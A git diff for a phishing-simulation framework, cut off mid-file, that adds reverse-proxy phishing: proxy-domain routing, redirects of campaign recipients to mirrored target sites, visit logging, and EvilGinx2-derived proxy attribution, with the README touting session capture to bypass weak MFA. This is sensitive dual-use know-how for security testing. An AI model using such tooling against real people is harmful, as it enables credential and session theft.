diff --git a/README.md b/README.md index 3b90601..3e1d123 100644 --- a/README.md +++ b/README.md @@ -23,6 +23,8 @@ For a manual step by step guide or more in depth installation information - [cli ## Features - **Multi-stage phishing flows** - Put together multiple phishing pages +- **Reverse proxy phishing** - Capture sessions to bypass weak MFA +- **Domain proxying** - Configure domains to proxy and mirror content from target sites - **Flexible scheduling** - Time windows, business hours, or manual delivery - **Multiple domains** - Auto TLS, custom sites, asset management - **Advanced delivery** - SMTP configs or custom API endpoints @@ -117,9 +119,12 @@ Visit the [Phishing Club Guide](https://phishing.club/guide/introduction/) for m | 8102 | Mail Server | Mailpit SMTP server with SpamAssassin integration | | 8103 | Container Logs | Dozzle log viewer | | 8104 | Container Stats | Docker container statistics | +| 8105 | MITMProxy| MITMProxy web interface | +| 8106 | MITMProxy | MITMProxy external access | | 8201 | ACME Server | Pebble ACME server for certificates | | 8202 | ACME Management | Pebble management interface | + ## Development Commands The `makefile` has a lot of convenience commands for development. diff --git a/THIRD_PARTY_LICENSES.md b/THIRD_PARTY_LICENSES.md new file mode 100644 index 0000000..e3972c4 --- /dev/null +++ b/THIRD_PARTY_LICENSES.md @@ -0,0 +1,64 @@ +# Third-Party Licenses +This file includes licenses from projects that are not dependencies but is included in some modified way. + +This project incorporates code from third-party sources under different licenses. While the overall project is licensed under AGPL-3.0, the following components retain their original licenses: + +## EvilGinx2 + +**Source**: https://github.com/kgretzky/evilginx2 +**License**: BSD-3-Clause +**Copyright**: Copyright (c) 2017-2023 Kuba Gretzky (@kgretzky) +**Usage**: Portions of the HTTP proxy functionality in `backend/proxy/proxy.go` are derived from EvilGinx2 + +### BSD-3-Clause License Text + +``` +Copyright (c) 2017-2023 Kuba Gretzky (@kgretzky) +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +``` + +## Bettercap + +**Source**: https://github.com/bettercap/bettercap +**License**: GPL-3.0 +**Copyright**: Copyright (c) 2016-2023 Simone Margaritelli (@evilsocket) +**Usage**: Portions of the HTTP proxy functionality (via EvilGinx2) are derived from Bettercap + +Note: EvilGinx2 itself incorporates and acknowledges code from the Bettercap project. Our usage maintains this attribution chain. + +--- + +## License Compatibility + +This project combines code under different licenses: + +- **Overall Project**: AGPL-3.0 (see main LICENSE file) +- **BSD-3-Clause Components**: Compatible with AGPL-3.0, incorporated with proper attribution +- **GPL-3.0 Components**: Compatible with AGPL-3.0 through inheritance chain + +All components are properly attributed and their usage complies with their respective license terms. diff --git a/backend/app/administration.go b/backend/app/administration.go index d82f556..51fc974 100644 --- a/backend/app/administration.go +++ b/backend/app/administration.go @@ -88,6 +88,10 @@ const ( ROUTE_V1_PAGE_OVERVIEW = "/api/v1/page/overview" ROUTE_V1_PAGE_ID = "/api/v1/page/:id" ROUTE_V1_PAGE_CONTENT_ID = "/api/v1/page/:id/content" + // proxy + ROUTE_V1_PROXY = "/api/v1/proxy" + ROUTE_V1_PROXY_OVERVIEW = "/api/v1/proxy/overview" + ROUTE_V1_PROXY_ID = "/api/v1/proxy/:id" // recipient and groups ROUTE_V1_RECIPIENT = "/api/v1/recipient" ROUTE_V1_RECIPIENT_IMPORT = "/api/v1/recipient/import" @@ -320,6 +324,13 @@ func setupRoutes( POST(ROUTE_V1_PAGE, middleware.SessionHandler, controllers.Page.Create). PATCH(ROUTE_V1_PAGE_ID, middleware.SessionHandler, controllers.Page.UpdateByID). DELETE(ROUTE_V1_PAGE_ID, middleware.SessionHandler, controllers.Page.DeleteByID). + // proxy + GET(ROUTE_V1_PROXY, middleware.SessionHandler, controllers.Proxy.GetAll). + GET(ROUTE_V1_PROXY_OVERVIEW, middleware.SessionHandler, controllers.Proxy.GetOverview). + GET(ROUTE_V1_PROXY_ID, middleware.SessionHandler, controllers.Proxy.GetByID). + POST(ROUTE_V1_PROXY, middleware.SessionHandler, controllers.Proxy.Create). + PATCH(ROUTE_V1_PROXY_ID, middleware.SessionHandler, controllers.Proxy.UpdateByID). + DELETE(ROUTE_V1_PROXY_ID, middleware.SessionHandler, controllers.Proxy.DeleteByID). // smtp configuration GET(ROUTE_V1_SMTP_CONFIGURATION, middleware.SessionHandler, controllers.SMTPConfiguration.GetAll). GET(ROUTE_V1_SMTP_CONFIGURATION_ID, middleware.SessionHandler, controllers.SMTPConfiguration.GetByID). diff --git a/backend/app/controllers.go b/backend/app/controllers.go index 943206e..fe2ad32 100644 --- a/backend/app/controllers.go +++ b/backend/app/controllers.go @@ -15,6 +15,7 @@ type Controllers struct { Installer *controller.Install InitialSetup *controller.InitialSetup Page *controller.Page + Proxy *controller.Proxy Log *controller.Log Option *controller.Option User *controller.User @@ -101,6 +102,10 @@ func NewControllers( PageService: services.Page, TemplateService: services.Template, } + proxy := &controller.Proxy{ + Common: common, + ProxyService: services.Proxy, + } option := &controller.Option{ Common: common, OptionService: services.Option, @@ -182,6 +187,7 @@ func NewControllers( InitialSetup: initialSetup, Health: health, Page: page, + Proxy: proxy, Log: log, Option: option, User: user, diff --git a/backend/app/repositories.go b/backend/app/repositories.go index a4e40a6..7139eff 100644 --- a/backend/app/repositories.go +++ b/backend/app/repositories.go @@ -12,6 +12,7 @@ type Repositories struct { Company *repository.Company Option *repository.Option Page *repository.Page + Proxy *repository.Proxy Role *repository.Role Session *repository.Session User *repository.User @@ -40,6 +41,7 @@ func NewRepositories( Company: &repository.Company{DB: db}, Option: option, Page: &repository.Page{DB: db}, + Proxy: &repository.Proxy{DB: db}, Role: &repository.Role{DB: db}, Session: &repository.Session{DB: db}, User: &repository.User{DB: db}, diff --git a/backend/app/server.go b/backend/app/server.go index df1978c..8a59fe5 100644 --- a/backend/app/server.go +++ b/backend/app/server.go @@ -9,6 +9,7 @@ import ( "mime" "net" "net/http" + "net/url" "os" "path/filepath" "strings" @@ -16,6 +17,7 @@ import ( "time" "github.com/go-errors/errors" + "gopkg.in/yaml.v3" "github.com/caddyserver/certmagic" securejoin "github.com/cyphar/filepath-securejoin" @@ -27,6 +29,7 @@ import ( "github.com/phishingclub/phishingclub/database" "github.com/phishingclub/phishingclub/errs" "github.com/phishingclub/phishingclub/model" + "github.com/phishingclub/phishingclub/proxy" "github.com/phishingclub/phishingclub/repository" "github.com/phishingclub/phishingclub/server" "github.com/phishingclub/phishingclub/service" @@ -50,6 +53,7 @@ type Server struct { controllers *Controllers services *Services repositories *Repositories + proxyServer *proxy.ProxyHandler } // NewServer returns a new server @@ -63,6 +67,38 @@ func NewServer( logger *zap.SugaredLogger, certMagicConfig *certmagic.Config, ) *Server { + // setup proxy cookie tracking + cookieName := "" + if option, err := repositories.Option.GetByKey(context.Background(), data.OptionKeyProxyCookieName); err == nil && option != nil { + cookieName = option.Value.String() + } + + // setup goproxy-based proxy server + proxyServer := proxy.NewProxyHandler( + logger, + repositories.Page, + repositories.CampaignRecipient, + repositories.Campaign, + repositories.CampaignTemplate, + repositories.Domain, + repositories.Proxy, + repositories.Identifier, + services.Campaign, + cookieName, + ) + + // setup proxy session cleanup routine + go func() { + ticker := time.NewTicker(5 * time.Minute) + defer ticker.Stop() + for { + select { + case <-ticker.C: + proxyServer.CleanupExpiredSessions() + } + } + }() + return &Server{ staticPath: staticPath, ownManagedTLSCertPath: ownManagedTLSCertPath, @@ -72,6 +108,7 @@ func NewServer( repositories: repositories, logger: logger, certMagicConfig: certMagicConfig, + proxyServer: proxyServer, } } @@ -233,21 +270,36 @@ func (s *Server) checkAndServeSharedAsset(c *gin.Context) bool { // checks if the request should be redirected // checks if the request is for a static page or static not found page func (s *Server) Handler(c *gin.Context) { + // add error recovery for handler + defer func() { + if r := recover(); r != nil { + s.logger.Errorw("panic in handler", + "panic", r, + "host", c.Request.Host, + "url", c.Request.URL.String(), + ) + c.Status(http.StatusInternalServerError) + c.Abort() + } + }() + host, err := s.getHostOnly(c.Request.Host) if err != nil { s.logger.Debugw("failed to parse host", + "rawHost", c.Request.Host, "error", err, ) c.Status(http.StatusNotFound) c.Abort() return } + // check if the domain is valid // use DB directly here to avoid getting unnecessary data // as a domain contains big blobs for static content var domain *database.Domain res := s.db. - Select("id, name, host_website, redirect_url"). + Select("id, name, type, proxy_id, proxy_target_domain, host_website, redirect_url"). Where("name = ?", host). First(&domain) @@ -257,6 +309,26 @@ func (s *Server) Handler(c *gin.Context) { c.Abort() return } + + // check if this is a proxy domain - if so, handle it with proxy server + if domain.Type == "proxy" { + s.logger.Debugw("handling proxy domain request", + "host", host, + "targetDomain", domain.ProxyTargetDomain, + "path", c.Request.URL.Path, + ) + err = s.proxyServer.HandleHTTPRequest(c.Writer, c.Request, domain) + if err != nil { + s.logger.Errorw("failed to handle proxy request", + "error", err, + "host", host, + ) + c.Status(http.StatusInternalServerError) + } + c.Abort() + return + } + // check if the request is for a tacking pixel if c.Request.URL.Path == "/wf/open" { s.controllers.Campaign.TrackingPixel(c) @@ -265,6 +337,8 @@ func (s *Server) Handler(c *gin.Context) { } // check if the request is for a phishing page or is denied by allow/deny list + // this must come BEFORE proxy cookie check to ensure initial requests with campaign recipient IDs + // are treated as initial requests even if they have existing proxy cookies isRequestForPhishingPageOrDenied, err := s.checkAndServePhishingPage(c, domain) if err != nil { s.logger.Errorw("failed to serve phishing page", @@ -278,6 +352,20 @@ func (s *Server) Handler(c *gin.Context) { if isRequestForPhishingPageOrDenied { return } + + // check for proxy cookie - only if this wasn't a phishing page request + // this ensures that requests with campaign recipient IDs are handled as initial requests + if s.proxyServer.IsValidProxyCookie(s.getProxyCookieValue(c)) { + err = s.proxyServer.HandleHTTPRequest(c.Writer, c.Request, domain) + if err != nil { + s.logger.Errorw("failed to handle proxy request", + "error", err, + ) + c.Status(http.StatusInternalServerError) + } + c.Abort() + return + } // check if the request is for assets servedAssets := s.checkAndServeAssets(c, host) if servedAssets { @@ -458,65 +546,26 @@ func (s *Server) checkAndServePhishingPage( c *gin.Context, domain *database.Domain, ) (bool, error) { - // get all identifiers and collect all that match query params - identifiers, err := s.repositories.Identifier.GetAll(c, &repository.IdentifierOption{}) + // get campaign recipient from URL parameters + campaignRecipient, _, err := server.GetCampaignRecipientFromURLParams( + c, + c.Request, + s.repositories.Identifier, + s.repositories.CampaignRecipient, + ) if err != nil { - s.logger.Debugw("failed to get all identifiers", + s.logger.Debugw("failed to get campaign recipient from URL parameters", "error", err, ) return false, errs.Wrap(err) } - query := c.Request.URL.Query() - matchingParams := []string{} - for _, identifier := range identifiers.Rows { - if name := identifier.Name.MustGet(); query.Has(name) { - matchingParams = append(matchingParams, name) - } - } - // check which match a UUIDv4 and check if any of those match a campaignrecipient id - matchingUUIDParams := []*uuid.UUID{} - for _, param := range matchingParams { - if id, err := uuid.Parse(query.Get(param)); err == nil { - matchingUUIDParams = append(matchingUUIDParams, &id) - } - } - if len(matchingUUIDParams) == 0 { - s.logger.Debugw("'campaignrecipient' not found", - "error", err, - ) - return false, nil - } - var campaignRecipient *model.CampaignRecipient - var campaignRecipientID *uuid.UUID - // however limit it to 3 attempts to prevent a DoS attack - for i, v := range matchingUUIDParams { - if i > 2 { - s.logger.Warn("too many attempts to get campaign recipient by a UUID. Ensure that there are no more than max 3 UUID in the phishing URL!") - return false, nil - } - campaignRecipient, err = s.repositories.CampaignRecipient.GetByCampaignRecipientID( - c, - v, - ) - if err != nil && !errors.Is(err, gorm.ErrRecordNotFound) { - s.logger.Debugw("failed to get active campaign and campaign recipient by query param", - "error", err, - ) - return false, fmt.Errorf("failed to get active campaign and campaign recipient by query param: %s", err) - } - if campaignRecipient != nil { - campaignRecipientID = v - break - } - } - // there was a campagin recipient id but it did not match a campaign - // this could be because there is an ID value but is not for us if campaignRecipient == nil { - s.logger.Debugw("'campaignrecipient' not found", - "error", err, - ) + s.logger.Debugw("'campaignrecipient' not found") return false, nil } + + campaignRecipientID := campaignRecipient.ID.MustGet() + campaignRecipientIDPtr := &campaignRecipientID // at this point we know which url param matched the campaignrecipientID, however // it could have been any available identifier and not the one matching the campaign template // it is possible now to check if it is correct, however it does not matter as the campaign @@ -587,16 +636,29 @@ func (s *Server) checkAndServePhishingPage( } // figure out which page types this template has var beforePageID *uuid.UUID + var beforeProxyID *uuid.UUID if v, err := cTemplate.BeforeLandingPageID.Get(); err == nil { beforePageID = &v + } else if v, err := cTemplate.BeforeLandingProxyID.Get(); err == nil { + beforeProxyID = &v } - landingPageID, err := cTemplate.LandingPageID.Get() - if err != nil { - return false, fmt.Errorf("Template is incomplete, missing landing page ID: %s", err) + + var landingPageID *uuid.UUID + var landingProxyID *uuid.UUID + if v, err := cTemplate.LandingPageID.Get(); err == nil { + landingPageID = &v + } else if v, err := cTemplate.LandingProxyID.Get(); err == nil { + landingProxyID = &v + } else { + return false, fmt.Errorf("Template is incomplete, missing landing page or Proxy ID") } + var afterPageID *uuid.UUID + var afterProxyID *uuid.UUID if v, err := cTemplate.AfterLandingPageID.Get(); err == nil { afterPageID = &v + } else if v, err := cTemplate.AfterLandingProxyID.Get(); err == nil { + afterProxyID = &v } stateParamKey := cTemplate.StateIdentifier.Name.MustGet() @@ -608,17 +670,50 @@ func (s *Server) checkAndServePhishingPage( } // if there is no page type then this is the before landing page or the landing page var pageID *uuid.UUID + var proxyID *uuid.UUID nextPageType := "" currentPageType := "" + + s.logger.Debugw("determining page flow", + "pageTypeQuery", pageTypeQuery, + "hasBeforePage", beforePageID != nil, + "hasBeforeProxy", beforeProxyID != nil, + "hasLandingPage", landingPageID != nil, + "hasLandingProxy", landingProxyID != nil, + "hasAfterPage", afterPageID != nil, + "hasAfterProxy", afterProxyID != nil, + "campaignRecipientID", campaignRecipientID.String(), + ) + if len(pageTypeQuery) == 0 { - if beforePageID != nil { - pageID = beforePageID + if beforePageID != nil || beforeProxyID != nil { + if beforePageID != nil { + pageID = beforePageID + s.logger.Debugw("initial request - serving before landing page", + "pageID", pageID.String(), + ) + } else { + proxyID = beforeProxyID + s.logger.Debugw("initial request - serving before landing Proxy", + "proxyID", proxyID.String(), + ) + } currentPageType = data.PAGE_TYPE_BEFORE nextPageType = data.PAGE_TYPE_LANDING } else { - pageID = &landingPageID + if landingPageID != nil { + pageID = landingPageID + s.logger.Debugw("initial request - serving landing page", + "pageID", pageID.String(), + ) + } else { + proxyID = landingProxyID + s.logger.Debugw("initial request - serving landing Proxy", + "proxyID", proxyID.String(), + ) + } currentPageType = data.PAGE_TYPE_LANDING - if afterPageID != nil { + if afterPageID != nil || afterProxyID != nil { nextPageType = data.PAGE_TYPE_AFTER } else { nextPageType = data.PAGE_TYPE_DONE // landing page is final page @@ -631,28 +726,70 @@ func (s *Server) checkAndServePhishingPage( case data.PAGE_TYPE_BEFORE: // this is set if the previous page was a before page case data.PAGE_TYPE_LANDING: - pageID = &landingPageID + if landingPageID != nil { + pageID = landingPageID + s.logger.Debugw("serving landing page from state", + "pageID", pageID.String(), + ) + } else { + proxyID = landingProxyID + s.logger.Debugw("serving landing Proxy from state", + "proxyID", proxyID.String(), + ) + } currentPageType = data.PAGE_TYPE_LANDING - if afterPageID != nil { + if afterPageID != nil || afterProxyID != nil { nextPageType = data.PAGE_TYPE_AFTER } else { - nextPageType = data.PAGE_TYPE_DONE // landiung page is final page + nextPageType = data.PAGE_TYPE_DONE // landing page is final page } // this is set if the previous page was a landing page case data.PAGE_TYPE_AFTER: if afterPageID != nil { pageID = afterPageID + s.logger.Debugw("serving after landing page from state", + "pageID", pageID.String(), + ) + } else if afterProxyID != nil { + proxyID = afterProxyID + s.logger.Debugw("serving after landing Proxy from state", + "proxyID", proxyID.String(), + ) + } else if landingPageID != nil { + pageID = landingPageID + s.logger.Debugw("fallback to landing page for after state", + "pageID", pageID.String(), + ) } else { - pageID = &landingPageID + proxyID = landingProxyID + s.logger.Debugw("fallback to landing Proxy for after state", + "proxyID", proxyID.String(), + ) } - // next page after a after landinge page, is the same page + // next page after a after landing page, is the same page currentPageType = data.PAGE_TYPE_AFTER nextPageType = data.PAGE_TYPE_DONE case data.PAGE_TYPE_DONE: if afterPageID != nil { pageID = afterPageID + s.logger.Debugw("serving after landing page for done state", + "pageID", pageID.String(), + ) + } else if afterProxyID != nil { + proxyID = afterProxyID + s.logger.Debugw("serving after landing Proxy for done state", + "proxyID", proxyID.String(), + ) + } else if landingPageID != nil { + pageID = landingPageID + s.logger.Debugw("fallback to landing page for done state", + "pageID", pageID.String(), + ) } else { - pageID = &landingPageID + proxyID = landingProxyID + s.logger.Debugw("fallback to landing Proxy for done state", + "proxyID", proxyID.String(), + ) } currentPageType = data.PAGE_TYPE_DONE nextPageType = data.PAGE_TYPE_DONE @@ -715,7 +852,7 @@ func (s *Server) checkAndServePhishingPage( campaignRecipient.NotableEventID.Set(*submitDataEventID) err := s.repositories.CampaignRecipient.UpdateByID( c, - campaignRecipientID, + campaignRecipientIDPtr, campaignRecipient, ) if err != nil { @@ -766,7 +903,252 @@ func (s *Server) checkAndServePhishingPage( } } } - // fetch the page + + // handle Proxy pages + if proxyID != nil { + // this is a Proxy page - redirect to the phishing domain + proxy, err := s.repositories.Proxy.GetByID( + c, + proxyID, + &repository.ProxyOption{}, + ) + if err != nil { + return true, fmt.Errorf("failed to get Proxy page: %s", err) + } + + startURL, err := proxy.StartURL.Get() + if err != nil { + return true, fmt.Errorf("Proxy page has no start URL: %s", err) + } + + // parse proxy config to find the phishing domain + proxyConfig, err := proxy.ProxyConfig.Get() + if err != nil { + return true, fmt.Errorf("Proxy page has no configuration: %s", err) + } + + // extract the phishing domain from Proxy configuration + var rawConfig map[string]interface{} + err = yaml.Unmarshal([]byte(proxyConfig.String()), &rawConfig) + if err != nil { + return true, fmt.Errorf("invalid Proxy configuration YAML: %s", err) + } + + // parse the start URL to get the target domain + parsedStartURL, err := url.Parse(startURL.String()) + if err != nil { + return true, fmt.Errorf("invalid proxy start URL: %s", err) + } + startDomain := parsedStartURL.Host + + // find the phishing domain mapping for the start URL domain + phishingDomain := "" + for originalHost, domainData := range rawConfig { + if originalHost == "proxy" || originalHost == "global" { + continue + } + if originalHost == startDomain { + if domainMap, ok := domainData.(map[string]interface{}); ok { + if to, exists := domainMap["to"]; exists { + if toStr, ok := to.(string); ok { + phishingDomain = toStr + break + } + } + } + } + } + + if phishingDomain == "" { + return true, fmt.Errorf("no phishing domain mapping found for start URL domain: %s", startDomain) + } + + // save the event of Proxy page being accessed + visitEventID := uuid.New() + eventName := "" + switch currentPageType { + case data.PAGE_TYPE_BEFORE: + eventName = data.EVENT_CAMPAIGN_RECIPIENT_BEFORE_PAGE_VISITED + case data.PAGE_TYPE_LANDING: + eventName = data.EVENT_CAMPAIGN_RECIPIENT_PAGE_VISITED + case data.PAGE_TYPE_AFTER: + eventName = data.EVENT_CAMPAIGN_RECIPIENT_AFTER_PAGE_VISITED + default: + eventName = data.EVENT_CAMPAIGN_RECIPIENT_PAGE_VISITED + } + eventID := cache.EventIDByName[eventName] + clientIP := vo.NewOptionalString64Must(c.ClientIP()) + userAgent := vo.NewOptionalString255Must(utils.Substring(c.Request.UserAgent(), 0, MAX_USER_AGENT_SAVED)) + var visitEvent *model.CampaignEvent + if !campaign.IsAnonymous.MustGet() { + visitEvent = &model.CampaignEvent{ + ID: &visitEventID, + CampaignID: &campaignID, + RecipientID: &recipientID, + IP: clientIP, + UserAgent: userAgent, + EventID: eventID, + Data: vo.NewEmptyOptionalString1MB(), + } + } else { + ua := vo.NewEmptyOptionalString255() + visitEvent = &model.CampaignEvent{ + ID: &visitEventID, + CampaignID: &campaignID, + RecipientID: nil, + IP: vo.NewEmptyOptionalString64(), + UserAgent: ua, + EventID: eventID, + Data: vo.NewEmptyOptionalString1MB(), + } + } + + // save the visit event unless it's the final page repeat + if currentPageType != data.PAGE_TYPE_DONE { + err = s.repositories.Campaign.SaveEvent( + c, + visitEvent, + ) + if err != nil { + s.logger.Errorw("failed to save proxy visit event", + "error", err, + "proxyID", proxyID.String(), + ) + } + + // check and update if most notable event for recipient + currentNotableEventID, _ := campaignRecipient.NotableEventID.Get() + if cache.IsMoreNotableCampaignRecipientEventID( + ¤tNotableEventID, + eventID, + ) { + campaignRecipient.NotableEventID.Set(*eventID) + err := s.repositories.CampaignRecipient.UpdateByID( + c, + campaignRecipientIDPtr, + campaignRecipient, + ) + if err != nil { + s.logger.Errorw("failed to update notable event for proxy", + "campaignRecipientID", campaignRecipientID.String(), + "eventID", eventID.String(), + "error", err, + ) + } + } + } + + // handle webhook for Proxy page visit + webhookID, err := s.repositories.Campaign.GetWebhookIDByCampaignID( + c, + &campaignID, + ) + if err != nil && !errors.Is(err, gorm.ErrRecordNotFound) { + s.logger.Errorw("failed to get webhook id by campaign id for proxy", + "campaignID", campaignID.String(), + "error", err, + ) + } + if webhookID != nil && currentPageType != data.PAGE_TYPE_DONE { + err = s.services.Campaign.HandleWebhook( + // TODO this should be tied to a application wide context not the request + context.TODO(), + webhookID, + &campaignID, + &recipientID, + eventName, + ) + if err != nil { + s.logger.Errorw("failed to handle webhook for Proxy page", + "error", err, + "proxyID", proxyID.String(), + ) + } + } + + // validate phishing domain format + if strings.Contains(phishingDomain, "://") || strings.Contains(phishingDomain, "/") { + return true, fmt.Errorf("invalid phishing domain format: %s", phishingDomain) + } + + // validate that the phishing domain is configured as a proxy domain + var phishingDomainRecord *database.Domain + res := s.db. + Select("id, name, type, proxy_id, proxy_target_domain"). + Where("name = ?", phishingDomain). + First(&phishingDomainRecord) + + if res.RowsAffected == 0 { + return true, fmt.Errorf("phishing domain '%s' is not configured in the system", phishingDomain) + } + + if phishingDomainRecord.Type != "proxy" { + return true, fmt.Errorf("phishing domain '%s' is not configured as proxy type", phishingDomain) + } + + s.logger.Debugw("redirecting to Proxy phishing domain", + "proxyID", proxyID.String(), + "startURL", startURL.String(), + "phishingDomain", phishingDomain, + "currentPageType", currentPageType, + "phishingDomainType", phishingDomainRecord.Type, + ) + + // build the redirect URL to the phishing domain with campaign recipient ID + urlParam := cTemplate.URLIdentifier.Name.MustGet() + + // construct the redirect URL properly + u := &url.URL{ + Scheme: "https", + Host: phishingDomain, + Path: parsedStartURL.Path, + } + + q := u.Query() + q.Set(urlParam, campaignRecipientID.String()) + if encryptedParam != "" { + q.Set(stateParamKey, encryptedParam) + } + // preserve any existing query params from start URL + if parsedStartURL.RawQuery != "" { + startQuery, _ := url.ParseQuery(parsedStartURL.RawQuery) + for key, values := range startQuery { + for _, value := range values { + q.Add(key, value) + } + } + } + u.RawQuery = q.Encode() + + s.logger.Debugw("built proxy redirect URL", + "redirectURL", u.String(), + "phishingDomain", phishingDomain, + "originalPath", parsedStartURL.Path, + ) + + // validate the final URL + finalURL := u.String() + if !strings.HasPrefix(finalURL, "https://") { + return true, fmt.Errorf("invalid redirect URL scheme: %s", finalURL) + } + + s.logger.Infow("redirecting to proxy domain", + "from", c.Request.Host+c.Request.URL.Path, + "to", finalURL, + "campaignRecipientID", campaignRecipientID.String(), + ) + + c.Redirect(http.StatusSeeOther, finalURL) + c.Abort() + return true, nil + } + + // ensure we have a page ID if we're not handling a proxy + if pageID == nil { + return true, fmt.Errorf("no page or proxy configured for current step") + } + + // fetch the regular page page, err := s.repositories.Page.GetByID( c, pageID, @@ -775,6 +1157,7 @@ func (s *Server) checkAndServePhishingPage( if err != nil { return true, fmt.Errorf("failed to get landing page: %s", err) } + // fetch the sender email to use for the template emailID := cTemplate.EmailID.MustGet() email, err := s.repositories.Email.GetByID( @@ -794,7 +1177,7 @@ func (s *Server) checkAndServePhishingPage( c, domain, email, - campaignRecipientID, + campaignRecipientIDPtr, recipient, page, cTemplate, @@ -860,7 +1243,7 @@ func (s *Server) checkAndServePhishingPage( campaignRecipient.NotableEventID.Set(*eventID) err := s.repositories.CampaignRecipient.UpdateByID( c, - campaignRecipientID, + campaignRecipientIDPtr, campaignRecipient, ) if err != nil { @@ -950,6 +1333,15 @@ func (s *Server) AssignRoutes(r *gin.Engine) { r.NoRoute(s.handlerNotFound) } +// getProxyCookieValue extracts proxy cookie value from gin context +func (s *Server) getProxyCookieValue(c *gin.Context) string { + cookieName := s.proxyServer.GetCookieName() + if cookieValue, err := c.Cookie(cookieName); err == nil { + return cookieValue + } + return "" +} + func (s *Server) StartHTTP( r *gin.Engine, conf *config.Config, diff --git a/backend/app/services.go b/backend/app/services.go index daab92b..703c420 100644 --- a/backend/app/services.go +++ b/backend/app/services.go @@ -16,6 +16,7 @@ type Services struct { InstallSetup *service.InstallSetup Option *service.Option Page *service.Page + Proxy *service.Proxy Session *service.Session User *service.User Domain *service.Domain @@ -141,6 +142,7 @@ func NewServices( PageRepository: repositories.Page, CampaignTemplateService: campaignTemplate, TemplateService: templateService, + DomainRepository: repositories.Domain, } domain := &service.Domain{ Common: common, @@ -154,6 +156,14 @@ func NewServices( FileService: file, TemplateService: templateService, } + proxy := &service.Proxy{ + Common: common, + ProxyRepository: repositories.Proxy, + DomainRepository: repositories.Domain, + CampaignRepository: repositories.Campaign, + CampaignTemplateService: campaignTemplate, + DomainService: domain, + } email := &service.Email{ Common: common, AttachmentPath: attachmentPath, @@ -242,6 +252,7 @@ func NewServices( InstallSetup: installSetup, Option: optionService, Page: page, + Proxy: proxy, Session: sessionService, User: userService, Domain: domain, diff --git a/backend/controller/campaignTemplate.go b/backend/controller/campaignTemplate.go index 01adf7b..05abe87 100644 --- a/backend/controller/campaignTemplate.go +++ b/backend/controller/campaignTemplate.go @@ -75,14 +75,17 @@ func (c *CampaignTemplate) GetByID(g *gin.Context) { _, ok = g.GetQuery("full") if ok { options = &repository.CampaignTemplateOption{ - WithDomain: true, - WithSMTPConfiguration: true, - WithAPISender: true, - WithEmail: true, - WithLandingPage: true, - WithBeforeLandingPage: true, - WithAfterLandingPage: true, - WithIdentifier: true, + WithDomain: true, + WithSMTPConfiguration: true, + WithAPISender: true, + WithEmail: true, + WithLandingPage: true, + WithBeforeLandingPage: true, + WithAfterLandingPage: true, + WithLandingProxy: true, + WithBeforeLandingProxy: true, + WithAfterLandingProxy: true, + WithIdentifier: true, } } // get @@ -130,16 +133,19 @@ func (c *CampaignTemplate) GetAll(g *gin.Context) { companyID, pagination, &repository.CampaignTemplateOption{ - QueryArgs: queryArgs, - Columns: columns, - WithDomain: true, - WithSMTPConfiguration: true, - WithAPISender: true, - WithEmail: true, - WithLandingPage: true, - WithBeforeLandingPage: true, - WithAfterLandingPage: true, - UsableOnly: usableOnly, + QueryArgs: queryArgs, + Columns: columns, + WithDomain: true, + WithSMTPConfiguration: true, + WithAPISender: true, + WithEmail: true, + WithLandingPage: true, + WithBeforeLandingPage: true, + WithAfterLandingPage: true, + WithLandingProxy: true, + WithBeforeLandingProxy: true, + WithAfterLandingProxy: true, + UsableOnly: usableOnly, }, ) // handle response diff --git a/backend/controller/proxy.go b/backend/controller/proxy.go new file mode 100644 index 0000000..77d87f9 --- /dev/null +++ b/backend/controller/proxy.go @@ -0,0 +1,194 @@ +package controller + +import ( + "github.com/gin-gonic/gin" + "github.com/phishingclub/phishingclub/database" + "github.com/phishingclub/phishingclub/model" + "github.com/phishingclub/phishingclub/repository" + "github.com/phishingclub/phishingclub/service" +) + +// ProxyColumnsMap is a map between the frontend and the backend +// so the frontend has user friendly names instead of direct references +// to the database schema +// this is tied to a slice in the repository package +var ProxyColumnsMap = map[string]string{ + "created_at": repository.TableColumn(database.PROXY_TABLE, "created_at"), + "updated_at": repository.TableColumn(database.PROXY_TABLE, "updated_at"), + "name": repository.TableColumn(database.PROXY_TABLE, "name"), + "target_domain": repository.TableColumn(database.PROXY_TABLE, "target_domain"), +} + +// Proxy is a proxy controller +type Proxy struct { + Common + ProxyService *service.Proxy +} + +// Create creates a proxy +func (m *Proxy) Create(g *gin.Context) { + // handle session + session, _, ok := m.handleSession(g) + if !ok { + return + } + // parse req + var req model.Proxy + if ok := m.handleParseRequest(g, &req); !ok { + return + } + // save proxy + id, err := m.ProxyService.Create( + g.Request.Context(), + session, + &req, + ) + // handle response + if ok := m.handleErrors(g, err); !ok { + return + } + m.Response.OK(g, map[string]string{ + "id": id.String(), + }) +} + +// GetOverview gets proxies overview using pagination +func (m *Proxy) GetOverview(g *gin.Context) { + session, _, ok := m.handleSession(g) + if !ok { + return + } + // parse request + queryArgs, ok := m.handleQueryArgs(g) + if !ok { + return + } + queryArgs.DefaultSortByUpdatedAt() + companyID := companyIDFromRequestQuery(g) + // get proxies + proxies, err := m.ProxyService.GetAllOverview( + companyID, + g, + session, + queryArgs, + ) + // handle response + if ok := 